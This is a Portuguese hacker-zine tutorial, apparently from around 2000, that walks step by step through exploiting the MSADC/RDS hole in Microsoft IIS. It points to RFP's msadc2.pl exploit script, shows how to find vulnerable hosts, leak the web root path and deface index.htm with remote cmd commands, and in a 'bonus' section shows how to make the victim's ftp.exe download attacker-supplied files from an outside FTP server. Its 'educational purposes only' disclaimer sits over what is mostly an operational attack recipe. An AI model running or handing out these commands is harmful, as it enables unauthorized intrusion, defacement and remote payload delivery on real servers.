// Antes de qualquer coisa, vale lembrar que esse texto eh apenas para fins
// educacionais, ou seja, tudo que voce fizer sera responsabilidade sua.
// NAO ESTOU INCENTIVANDO NINGUEM A COMETER CRIMES DIGITAIS.
// Essas falhas e tecnicas ja estao mundialmente conhecidas, mas mesmo assim
// muitos servidores (principalmente do governo brasileiro) ainda estao
// vulneraveis. Espero que apos esse texto os admins REALMENTE percebam os
// enormes riscos deste problema e o elimine.
// Estou levando em conta que voce ira utilizar essas tecnicas apenas
// em suas proprias maquinas ou em maquinas que voce tenha devida autorizacao
// para isso.

Sem apresentacoes, vamos direto ao texto:

Atualmente, podemos perceber uma grande demanda de "raquers" invadindo
paginas do governo e por esse motivo se auto-intitulando "elite".
Entao, mesmo eu nao fazendo parte deste seleto grupo, resolvi mostrar os
grandes segredos de invasao usados por essa "superhypermega elite".
Ate mesmo na pagina do RFP (o que codou o exploit) voce pode ver o texto:
Lammers wanted e um simbolo: RDS. O porque disso tudo? Voce vai entender
ja.

Como identificar uma pagina "raqueada" com MSADC: 99% das vezes essas paginas
estao com fundo branco, apenas com um texto e nenhuma imagem, link, etc
O motivo disso voce ira entender mais abaixo.

MAS ATENCAO! preste muita, mais muita atencao mesmo, porque essa tecnica
e' dificilima, e requer um alto conhecimento tecnico em computacao!
Antes de utiliza-la, recomendo que voce faca como a "elite raquer" e leia
antes os livros: Manual Completo do Raquer (versao 2000!) Panico na
Internerd (1, 2 e 3), e outros textos extremamente tecnicos (huahahahaha)

Obs: Vale lembrar que eu nao estou menosprezando quem usa a tecnica do RDS
(qualquer tecnica que te de acesso a maquina eh valida) e sim esses grupos
que se acham elite por usa-la.

Ok, voce ja leu os livros? Entao VAMOS LA, hora de acao!

Primeiro, voce vai nos sites abaixo ler um pouquinho, pois nao vou ficar aqui
explicando virgula por virgula todos os detalhes do bug. Os textos sao em
ingles, mas tem a traducao de um deles por la. A historia em torno desse bug
eh muito interessante, involvendo umas "alfinetadas" entre o Russ da NTBugtraq
e o RFP.

Mas, se voce prefere fazer como a "elite" e ir direto ao assunto ("Nao preciso
ler essas porcarias"), ok, vai em frente.

http://www.wiretrip.net/rfp/p/doc.asp?id=1
http://www.wiretrip.net/rfp/p/doc.asp?id=3
http://www.wiretrip.net/rfp/p/doc.asp?id=4
http://www.wiretrip.net/rfp/p/doc.asp?id=5
http://www.wiretrip.net/rfp/p/doc.asp?id=29

e dessas hps tem muito mais link p/ vc se virar

Voce vai precisar tambem desse script escrito em perl, mas ATENCAO: nao
divulgue esse script, ou a "elite" vai puxar seu pe a noite.

http://www.wiretrip.net/rfp/bins/scripts/msadc2.pl

Depois voce vai precisar do PERL. Se vc nao tem, www.perl.com e pegue a versao
do seu SO.

Para saber se uma maquina eh vulneravel: vai no browser e digita:
http://www.seuservidor.com/msadc/msadcs.dll
caso o arquivo for encontrado, provavelmente seu servidor eh vulneravel

Encontrou um servudor vulneravel? Ok, entao agora tudo o que voce deve
fazer eh o seguinte: (faca um backup do seu index.htm antes p/ nao perde-lo)

1§ - perl msadc.pl -h www.hostvulneravel.com
ele vai te pedir para digitar um comando. Voce digita:

cmd /c echo Agora tambem sou da elite raquer > caminhoDowwwroot\index.htm

pronto. Parabens, 31337!

"Po, mas como eu consigo o caminhoDowwwroot?"
Vai no seu browser e digita:
www.hostvulneravel.com/qualquermerda.idq
ou
www.hostvulneravel.com/qualquermerda.htx
www.hostvulneravel.com/qualquermerda.idc

existem outros metodos tb (shtml.exe? hum...), isso fica por sua conta
um desses provavelmente ira funcionar, e vc recebera uma pagina com o seguinte
erro:
"path not found c:\inetpub\wwwroot\qualquermerda.idq"
pronto

ou seja, fica
cmd /c echo Agora tambem sou da elite > c:\inetpub\wwwroot\index.htm

Lembrando que outros comandos funcionam perfeitamente. Entao:
cmd /c dir c:\ /s > c:\inetpub\wwwroot\dirc.txt

vai criar uma listagem dos arquivos na unidade c: em
www.hostvulneravel.com/dirc.txt

Parabens, agora voce tambem conhece as tecnicas da "elite".

--[BONUS!]-------------------------------------------------------------------
Como colocar uma html no lugar daquela coisa feia de txt!
(ou qualquer outro arquivo)

Ok, voce viu que seu servidor esta vulneravel, e resolveu colocar uma html la.
Soh que de repente voce percebe que vc nao pode fazer coisas do tipo:

cmd /c echo <HTML> etc,etc,etc </HTML> > c:\inetpub\wwwroot\test.htm

Nao meu amigo, voce tem que usar seu cerebro, e arrumar um outro jeito de
colocar o arquivo que voce quer no servidor, neste exemplo, um HTML.
(Sim, isso mesmo. Por isso que 99% dos defacements com RDS soh possuem um
texto e + nada. Na verdade aquilo nada mais eh que um arquivo texto com
extensao htm).

Existem diversas tecnicas usadas pra isso, algumas envolvendo compartilhamento
de arquivos (usado pelo pessoal do r00tabega em um .pl ai p/ automatizar esse
processo), etc. Porem vou descrever aqui uma outra tecnica que funciona
perfeitamente. Ela consiste em usar o ftp.exe do servidor para fazer os
downloads dos arquivos que nos queremos, e depois usa-los a vontade.
(ultimamente andam saindo uns scripts ai que andam usando essa tecnica,
mas eu vou explicar como fazer na mao mesmo). Vamos la:

Se voce analizar as opcoes do ftp.exe, voce vai ver a seguinte opcao:

-s:filename Specifies a text file containing FTP commands; the
commands will automatically run after FTP starts.

Isso mesmo, se vc usar ftp -s:comandos.txt ele vai rodar os comandos no
arquivo comandos.txt.

entao, o que vc tem a fazer eh criar um txt no server com os comandos que
voce quer. Voce tem que ter um FTP Server onde voce tenha permissao de escrita
(sim, pode ser o seu mesmo. Levando em consideracao que voce esta usando isso
em maquinas que voce tenha autorizacao, isso nao tem nenhum problema ;)

Ok, digamos que nosso ftp Server eh ftp.meuservidor.com
no diretorio /incoming do ftp.meuservidor.com nos colocamos nosso arquivo
HTML pronto (index.htm)

agora, usamos o script (duh!)

$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo open <ip_do_seu_ftp_server> > comandos.txt

$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo anonymous >> comandos.txt (algumas vezes vc pode
ter problemas com os 2
primeiros, por isso
os quotes abaixo.)

$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo qualquermerda@duh >> comandos.txt

$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo quote user anonymous >> comandos.txt

$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo quote pass [email protected] >> comandos.txt

$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo cd /incoming >> comandos.txt (eu gosto de cd antes,
e dai? :P)
$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo get index.htm >> comandos.txt

$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo bye >> comandos.txt

e pra finalizar,

$ perl msadc.pl -h www.hostvulneravel.com
cmd /c ftp -s:comandos.txt

seria melhor ver se tudo ocorreu bem, entao seria melhor usar:

$ perl msadc.pl -h www.hostvulneravel.com
cmd /c ftp -s:comandos.txt > c:\inetpub\wwwroot\ftpresults.txt

e ver no ftpresults.txt se tudo rolou como desejado.

se tudo ocorreu bem, seu html esta la. pronto amigo, agora coloque ele
onde voce quiser :)

(se for passar arquivos binarios, nao esqueca do comando bin antes!)

E dai em diante, voce pode fazer 1000 coisas. Eh soh ter criatividade.

Ok, depois desse texto espero ver algumas htmls legais por ae, e nao aquele
monte de texto feio :P :)

that's all folks

see ya